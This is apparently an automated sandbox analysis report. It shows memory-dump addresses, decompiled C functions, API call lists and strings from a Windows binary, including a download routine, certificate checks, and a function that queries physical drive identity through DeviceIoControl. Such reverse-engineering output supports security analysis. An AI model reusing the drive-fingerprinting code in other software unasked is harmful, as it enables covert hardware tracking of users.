                                                                                                                                                                  0x0042dd6a
                                                                                                                                                                  0x0042dd70
                                                                                                                                                                  0x0042dd72
                                                                                                                                                                  0x0042dd78
                                                                                                                                                                  0x0042dd7a
                                                                                                                                                                  0x0042de61
                                                                                                                                                                  0x0042de63
                                                                                                                                                                  0x0042de66
                                                                                                                                                                  0x0042df6a
                                                                                                                                                                  0x0042df6d
                                                                                                                                                                  0x0042df73
                                                                                                                                                                  0x0042df75
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042df7b
                                                                                                                                                                  0x0042df85
                                                                                                                                                                  0x0042df85
                                                                                                                                                                  0x0042df8c
                                                                                                                                                                  0x0042df92
                                                                                                                                                                  0x0042df92
                                                                                                                                                                  0x0042df94
                                                                                                                                                                  0x0042df9a
                                                                                                                                                                  0x0042dfa0
                                                                                                                                                                  0x0042dfa0
                                                                                                                                                                  0x0042dfa2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dfa4
                                                                                                                                                                  0x0042dfa7
                                                                                                                                                                  0x0042dfaa
                                                                                                                                                                  0x0042dfad
                                                                                                                                                                  0x0042dfb3
                                                                                                                                                                  0x0042dfba
                                                                                                                                                                  0x0042dfbe
                                                                                                                                                                  0x0042dfbf
                                                                                                                                                                  0x0042dfc2
                                                                                                                                                                  0x0042dfc8
                                                                                                                                                                  0x0042dfcb
                                                                                                                                                                  0x0042dfcb
                                                                                                                                                                  0x0042dfcb
                                                                                                                                                                  0x0042dfce
                                                                                                                                                                  0x0042dfd1
                                                                                                                                                                  0x0042dfd4
                                                                                                                                                                  0x0042dfd7
                                                                                                                                                                  0x0042dfd7
                                                                                                                                                                  0x0042dff7
                                                                                                                                                                  0x0042e006
                                                                                                                                                                  0x0042e00c
                                                                                                                                                                  0x0042e012
                                                                                                                                                                  0x0042e018
                                                                                                                                                                  0x0042e01e
                                                                                                                                                                  0x0042e020
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e026
                                                                                                                                                                  0x0042e026
                                                                                                                                                                  0x0042e028
                                                                                                                                                                  0x0042e02e
                                                                                                                                                                  0x0042e059
                                                                                                                                                                  0x0042e05f
                                                                                                                                                                  0x0042e061
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e069
                                                                                                                                                                  0x0042e06f
                                                                                                                                                                  0x0042e075
                                                                                                                                                                  0x0042e07b
                                                                                                                                                                  0x0042e07d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e09b
                                                                                                                                                                  0x0042e09b
                                                                                                                                                                  0x0042e09d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e09d
                                                                                                                                                                  0x0042e081
                                                                                                                                                                  0x0042e087
                                                                                                                                                                  0x0042e08d
                                                                                                                                                                  0x0042e08f
                                                                                                                                                                  0x0042e095
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e09f
                                                                                                                                                                  0x0042e09f
                                                                                                                                                                  0x0042e0a5
                                                                                                                                                                  0x0042e0ad
                                                                                                                                                                  0x0042e0af
                                                                                                                                                                  0x0042e0b5
                                                                                                                                                                  0x0042e0b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0bd
                                                                                                                                                                  0x0042de6c
                                                                                                                                                                  0x0042de72
                                                                                                                                                                  0x0042de75
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042de7b
                                                                                                                                                                  0x0042de85
                                                                                                                                                                  0x0042de85
                                                                                                                                                                  0x0042de8c
                                                                                                                                                                  0x0042de94
                                                                                                                                                                  0x0042de94
                                                                                                                                                                  0x0042de96
                                                                                                                                                                  0x0042de9c
                                                                                                                                                                  0x0042dea2
                                                                                                                                                                  0x0042dea2
                                                                                                                                                                  0x0042dea5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dea7
                                                                                                                                                                  0x0042deaa
                                                                                                                                                                  0x0042dead
                                                                                                                                                                  0x0042deb0
                                                                                                                                                                  0x0042deb6
                                                                                                                                                                  0x0042debd
                                                                                                                                                                  0x0042dec1
                                                                                                                                                                  0x0042dec2
                                                                                                                                                                  0x0042dec5
                                                                                                                                                                  0x0042decb
                                                                                                                                                                  0x0042dece
                                                                                                                                                                  0x0042ded1
                                                                                                                                                                  0x0042ded1
                                                                                                                                                                  0x0042ded1
                                                                                                                                                                  0x0042ded4
                                                                                                                                                                  0x0042ded7
                                                                                                                                                                  0x0042deda
                                                                                                                                                                  0x0042dedd
                                                                                                                                                                  0x0042dedd
                                                                                                                                                                  0x0042def1
                                                                                                                                                                  0x0042df0a
                                                                                                                                                                  0x0042df1a
                                                                                                                                                                  0x0042df20
                                                                                                                                                                  0x0042df26
                                                                                                                                                                  0x0042df2c
                                                                                                                                                                  0x0042df2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042df34
                                                                                                                                                                  0x0042df3a
                                                                                                                                                                  0x0042df40
                                                                                                                                                                  0x0042db28
                                                                                                                                                                  0x0042db2a
                                                                                                                                                                  0x0042db70
                                                                                                                                                                  0x0042db72
                                                                                                                                                                  0x0042db78
                                                                                                                                                                  0x0042db7e
                                                                                                                                                                  0x0042db7f
                                                                                                                                                                  0x0042db84
                                                                                                                                                                  0x0042db87
                                                                                                                                                                  0x0042db8a
                                                                                                                                                                  0x0042dd3c
                                                                                                                                                                  0x0042dd3c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd3c
                                                                                                                                                                  0x0042db90
                                                                                                                                                                  0x0042db96
                                                                                                                                                                  0x0042db9b
                                                                                                                                                                  0x0042dba3
                                                                                                                                                                  0x0042dbbd
                                                                                                                                                                  0x0042dbc3
                                                                                                                                                                  0x0042dbc9
                                                                                                                                                                  0x0042dbcb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dbef
                                                                                                                                                                  0x0042dbf5
                                                                                                                                                                  0x0042dbf7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc09
                                                                                                                                                                  0x0042dc0f
                                                                                                                                                                  0x0042dc15
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc1b
                                                                                                                                                                  0x0042dc22
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc3d
                                                                                                                                                                  0x0042dc4b
                                                                                                                                                                  0x0042dc51
                                                                                                                                                                  0x0042dc53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc59
                                                                                                                                                                  0x0042dc60
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc66
                                                                                                                                                                  0x0042dc6c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc6c
                                                                                                                                                                  0x0042db32
                                                                                                                                                                  0x0042db3d
                                                                                                                                                                  0x0042db40
                                                                                                                                                                  0x0042dd19
                                                                                                                                                                  0x0042dd28
                                                                                                                                                                  0x0042dd28
                                                                                                                                                                  0x0042dd29
                                                                                                                                                                  0x0042dd34
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd34
                                                                                                                                                                  0x0042db50
                                                                                                                                                                  0x0042db55
                                                                                                                                                                  0x0042db58
                                                                                                                                                                  0x0042db5b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042db67
                                                                                                                                                                  0x0042db68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042db68
                                                                                                                                                                  0x0042db0b
                                                                                                                                                                  0x0042db0e
                                                                                                                                                                  0x0042db13
                                                                                                                                                                  0x0042db16
                                                                                                                                                                  0x0042db1b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd0e
                                                                                                                                                                  0x0042dd0e
                                                                                                                                                                  0x0042dd0e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd17
                                                                                                                                                                  0x0042da98
                                                                                                                                                                  0x0042da9a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da9a
                                                                                                                                                                  0x0042da34
                                                                                                                                                                  0x0042d9f5
                                                                                                                                                                  0x0042d9fc
                                                                                                                                                                  0x0042da02
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da02
                                                                                                                                                                  0x0042d9e2
                                                                                                                                                                  0x0042d9e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042d9e5
                                                                                                                                                                  0x0042d999
                                                                                                                                                                  0x0042d9a0
                                                                                                                                                                  0x0042d9ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042d9ab
                                                                                                                                                                  0x0042d989
                                                                                                                                                                  0x00000000

Memory Dump Source
• Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
• Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
• Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cd571c46d921342ae328bc226716b59bec4f1646cf6de2fc2b105e6fd3e42bb
• Instruction ID: 891cd7d9590e1a7e1ffb108c77c810cdab370ba3ef007c3d29cf8127fac5fbb5
• Opcode Fuzzy Hash: 2cd571c46d921342ae328bc226716b59bec4f1646cf6de2fc2b105e6fd3e42bb
• Instruction Fuzzy Hash: 21328175F026388BCB248F15ED406EAB7B5FB06314F8841EAE40AE7A41D7349D81CF5A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                  			E00425ADA(void* _a4, void* _a8, long _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, void* _a28, long _a32, intOrPtr* _a36) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				void* __ecx;
                                                                                                                                                                  				signed short _t38;
                                                                                                                                                                  				signed short _t49;
                                                                                                                                                                  				signed int _t52;
                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t65;
                                                                                                                                                                  				signed int _t66;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  
                                                                                                                                                                  				_push(_t67);
                                                                                                                                                                  				_push(_t67);
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t74 = _a12;
                                                                                                                                                                  				_t77 = E00436FAF(_t67, _a8,  *_t74,  *((intOrPtr*)(_t74 + 4)), 0, 0);
                                                                                                                                                                  				if(_t77 >= 0) {
                                                                                                                                                                  					L3:
                                                                                                                                                                  					while(InternetReadFile(_a4, _a28, _a32,  &_v8) != 0) {
                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                  							_t65 = 0;
                                                                                                                                                                  							_a12 = _a12 & 0;
                                                                                                                                                                  							while(WriteFile(_a8, _a28 + _t65, _v8 - _t65,  &_a12, 0) != 0) {
                                                                                                                                                                  								_t65 = _t65 + _a12;
                                                                                                                                                                  								if(_a12 == 0 || _t65 >= _v8) {
                                                                                                                                                                  									 *_t74 =  *_t74 + _t65;
                                                                                                                                                                  									_t52 = 0;
                                                                                                                                                                  									asm("adc [edi+0x4], eax");
                                                                                                                                                                  									if(_a16 != 0xffffffff) {
                                                                                                                                                                  										_t66 = _t52;
                                                                                                                                                                  										_v12 = _t52;
                                                                                                                                                                  										_t55 = E00436FAF(_t67, _a16, _t52, _t52, _t52, _t52);
                                                                                                                                                                  										if(_t55 >= 0) {
                                                                                                                                                                  											do {
                                                                                                                                                                  												_push(0);
                                                                                                                                                                  												_push( &_v12);
                                                                                                                                                                  												_t57 = 8;
                                                                                                                                                                  												WriteFile(_a16, _t74 + _t66 * 8, _t57 - _t66, ??, ??);
                                                                                                                                                                  												_t66 = _t66 + _v12;
                                                                                                                                                                  											} while (_v12 != 0 && _t66 < 8);
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push("Failed to seek to start point in file.");
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  											_t67 = _t55;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  									_t53 = _a36;
                                                                                                                                                                  									if(_t53 == 0 ||  *_t53 == 0) {
                                                                                                                                                                  										L17:
                                                                                                                                                                  										if(_v8 != 0) {
                                                                                                                                                                  											goto L3;
                                                                                                                                                                  										} else {
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t77 = E00414038(_t53,  *_t74,  *((intOrPtr*)(_t74 + 4)), _a20, _a24, _a8);
                                                                                                                                                                  										if(_t77 < 0) {
                                                                                                                                                                  											_push("UX aborted on cache progress.");
                                                                                                                                                                  											L22:
                                                                                                                                                                  											_push(_t77);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  										} else {
                                                                                                                                                                  											goto L17;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L23;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t49 = GetLastError();
                                                                                                                                                                  							_t84 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t77 =  >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "downloadengine.cpp", 0x1bc, _t77);
                                                                                                                                                                  							_push("Failed to write data from internet.");
                                                                                                                                                                  							goto L22;
                                                                                                                                                                  						}
                                                                                                                                                                  						L23:
                                                                                                                                                                  						goto L24;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t38 = GetLastError();
                                                                                                                                                                  					_t80 =  <=  ? _t38 : _t38 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t77 =  >=  ? 0x80004005 :  <=  ? _t38 : _t38 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "downloadengine.cpp", 0x1b0, _t77);
                                                                                                                                                                  					_push("Failed while reading from internet.");
                                                                                                                                                                  					goto L22;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to seek to start point in file.");
                                                                                                                                                                  					_push(_t77);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L24:
                                                                                                                                                                  				return _t77;
                                                                                                                                                                  			}


















                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436FAF: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,00412161,00000000,00000000,00000000,00000000,00000000), ref: 00436FC7
                                                                                                                                                                    • Part of subcall function 00436FAF: GetLastError.KERNEL32(?,?,?,00412161,00000000,00000000,00000000,00000000,00000000,?,00401414,00000000,?), ref: 00436FD1
                                                                                                                                                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00425B1F
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0042533F,?,?,?,?,?,00000000,?,00010000,?), ref: 00425B51
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorInternetLastPointerReadWrite
                                                                                                                                                                  • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$downloadengine.cpp
                                                                                                                                                                  • API String ID: 1734627056-3175886020
                                                                                                                                                                  • Opcode ID: 5fd388c1c6299388a1f04bb7cd9e022af3dfafb6caba54791fdd93532f3080a0
                                                                                                                                                                  • Instruction ID: 65363c7b8b9019903e6d81b89b3821b77fad0723c48567d30cf1735180ee52de
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fd388c1c6299388a1f04bb7cd9e022af3dfafb6caba54791fdd93532f3080a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 92419132600725BFEB119E65EC45FAB7AA8EF04755F500227FD00E6190E778AD50DAA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptHashPublicKeyInfo.CRYPT32(00000000,00008004,00000000,00000001,?,00000000,00000014), ref: 00412A69
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00412B35
                                                                                                                                                                    • Part of subcall function 00438141: CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 00438156
                                                                                                                                                                    • Part of subcall function 00438141: GetLastError.KERNEL32(?,?,00412AAC,?,00000003,00000000,00000000), ref: 00438160
                                                                                                                                                                  Strings
                                                                                                                                                                  • cache.cpp, xrefs: 00412B59
                                                                                                                                                                  • Failed to read certificate thumbprint., xrefs: 00412B2D
                                                                                                                                                                  • Failed to find expected public key in certificate chain., xrefs: 00412AFC
                                                                                                                                                                  • Failed to get certificate public key identifier., xrefs: 00412B63
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CertCertificateContextCryptHashInfoPropertyPublic
                                                                                                                                                                  • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                                                                  • API String ID: 1813738816-3408201827
                                                                                                                                                                  • Opcode ID: fec7dc94424385deb9900995774a9cf97171cbe8872712486e9f05ddb3da3a41
                                                                                                                                                                  • Instruction ID: a19f82367d5525c0bf468fc91e4de51159795ef4e0bb9282c6a0c5c6f73bd77f
                                                                                                                                                                  • Opcode Fuzzy Hash: fec7dc94424385deb9900995774a9cf97171cbe8872712486e9f05ddb3da3a41
                                                                                                                                                                  • Instruction Fuzzy Hash: 19417F72A002199FDB10DF69D981EEFB7F8BF08754F11402AE904EB251D678EC51CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00457E88,00000000,00401C5F,?,?,?,004079F6,8007000D,Failed to find valid DOS image header in buffer.,section.cpp,0000005A,8007000D,?,?,?,00401C5F), ref: 0043071F
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,004079F6,8007000D,Failed to find valid DOS image header in buffer.,section.cpp,0000005A,8007000D,?,?,?,00401C5F,77A19EB0,00000000), ref: 0043072F
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430738
                                                                                                                                                                  • GetLocalTime.KERNEL32(8007000D,?,004079F6,8007000D,Failed to find valid DOS image header in buffer.,section.cpp,0000005A,8007000D,?,?,?,00401C5F,77A19EB0,00000000), ref: 0043074E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00457E88,004079F6,00000000,00000000,0000FDE9), ref: 00430841
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 004307E8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                  • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                  • API String ID: 296830338-59366893
                                                                                                                                                                  • Opcode ID: ce6042b18dc24e00bf27926c5c8670c6af6f7ca955e1f79a9a4d7455feff7a8c
                                                                                                                                                                  • Instruction ID: 9c3281dea1d6eb25fbe06b0843c67677250ac65d488ff4d2e0b45fd5d339dd1b
                                                                                                                                                                  • Opcode Fuzzy Hash: ce6042b18dc24e00bf27926c5c8670c6af6f7ca955e1f79a9a4d7455feff7a8c
                                                                                                                                                                  • Instruction Fuzzy Hash: A441AD32A00219ABCB149BA9DC55BBFB7F8AB4C702F105177FA01E2251D73C9D44CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E1001D3D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				struct _OVERLAPPED* _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				short _v540;
                                                                                                                                                                  				char _v1564;
                                                                                                                                                                  				long _v1568;
                                                                                                                                                                  				long _v1572;
                                                                                                                                                                  				intOrPtr _v1576;
                                                                                                                                                                  				struct _OVERLAPPED* _v1580;
                                                                                                                                                                  				struct _OVERLAPPED* _v1584;
                                                                                                                                                                  				struct _OVERLAPPED* _v1588;
                                                                                                                                                                  				struct _OVERLAPPED* _v1592;
                                                                                                                                                                  				struct _OVERLAPPED* _v1596;
                                                                                                                                                                  				struct _OVERLAPPED* _v1600;
                                                                                                                                                                  				struct _OVERLAPPED* _v1604;
                                                                                                                                                                  				void _v1608;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				int _t63;
                                                                                                                                                                  				void* _t64;
                                                                                                                                                                  				int _t76;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t98;
                                                                                                                                                                  				void* _t99;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  
                                                                                                                                                                  				_t97 = __esi;
                                                                                                                                                                  				_t96 = __edi;
                                                                                                                                                                  				_t77 = __ebx;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = _a4;
                                                                                                                                                                  				_v1584 = 0;
                                                                                                                                                                  				_v1580 = 0;
                                                                                                                                                                  				do {
                                                                                                                                                                  					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
                                                                                                                                                                  					_t99 = _t99 + 0xc;
                                                                                                                                                                  					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
                                                                                                                                                                  					if(_v24 != 0xffffffff) {
                                                                                                                                                                  						_v1572 = 0;
                                                                                                                                                                  						_v1608 = 0;
                                                                                                                                                                  						_v1604 = 0;
                                                                                                                                                                  						_v1600 = 0;
                                                                                                                                                                  						_v1596 = 0;
                                                                                                                                                                  						_v1592 = 0;
                                                                                                                                                                  						_v1588 = 0;
                                                                                                                                                                  						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
                                                                                                                                                                  						__eflags = _t63;
                                                                                                                                                                  						if(_t63 != 0) {
                                                                                                                                                                  							_t64 = L1000CEAF(_t77,  &_v1608, _t96, _t97, 0x221);
                                                                                                                                                                  							_t100 = _t99 + 4;
                                                                                                                                                                  							_v8 = _t64;
                                                                                                                                                                  							 *((char*)(_v8 + 0xa)) = 0xec;
                                                                                                                                                                  							_v1568 = 0;
                                                                                                                                                                  							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								L10:
                                                                                                                                                                  								CloseHandle(_v24);
                                                                                                                                                                  								_push(_v8);
                                                                                                                                                                  								E1000CA40(_t77, _t96, _t97, __eflags);
                                                                                                                                                                  								_t99 = _t100 + 4;
                                                                                                                                                                  								__eflags = _v1584;
                                                                                                                                                                  								if(_v1584 == 0) {
                                                                                                                                                                  									_v12 = _v1580;
                                                                                                                                                                  									goto L13;
                                                                                                                                                                  								}
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_v20 = 0;
                                                                                                                                                                  							do {
                                                                                                                                                                  								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
                                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                                  								__eflags = _v20 - 0x100;
                                                                                                                                                                  							} while (_v20 < 0x100);
                                                                                                                                                                  							_v1576 = E1001CDD0( &_v1564);
                                                                                                                                                                  							_t76 = E1001D000(_v1576, 0x104, _v16);
                                                                                                                                                                  							_t100 = _t100 + 0x10;
                                                                                                                                                                  							__eflags = _t76;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								_v1584 = 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					L13:
                                                                                                                                                                  					_v12 =  &(_v12->Internal);
                                                                                                                                                                  					_v1580 = _v12;
                                                                                                                                                                  				} while (_v12 < 4);
                                                                                                                                                                  				return _v1584;
                                                                                                                                                                  			}
                                                                                                                                                                  0x1001d4be
                                                                                                                                                                  0x1001d4c4
                                                                                                                                                                  0x1001d4c8
                                                                                                                                                                  0x1001d4f9
                                                                                                                                                                  0x1001d4fb
                                                                                                                                                                  0x1001d566
                                                                                                                                                                  0x1001d56a
                                                                                                                                                                  0x1001d573
                                                                                                                                                                  0x1001d574
                                                                                                                                                                  0x1001d579
                                                                                                                                                                  0x1001d57c
                                                                                                                                                                  0x1001d583
                                                                                                                                                                  0x1001d58d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d58d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d585
                                                                                                                                                                  0x1001d4fd
                                                                                                                                                                  0x1001d504
                                                                                                                                                                  0x1001d512
                                                                                                                                                                  0x1001d51f
                                                                                                                                                                  0x1001d522
                                                                                                                                                                  0x1001d522
                                                                                                                                                                  0x1001d53a
                                                                                                                                                                  0x1001d550
                                                                                                                                                                  0x1001d555
                                                                                                                                                                  0x1001d558
                                                                                                                                                                  0x1001d55a
                                                                                                                                                                  0x1001d55c
                                                                                                                                                                  0x1001d55c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d55a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d4ac
                                                                                                                                                                  0x1001d590
                                                                                                                                                                  0x1001d596
                                                                                                                                                                  0x1001d59c
                                                                                                                                                                  0x1001d5a2
                                                                                                                                                                  0x1001d5b5

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D40A
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D429
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D4A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
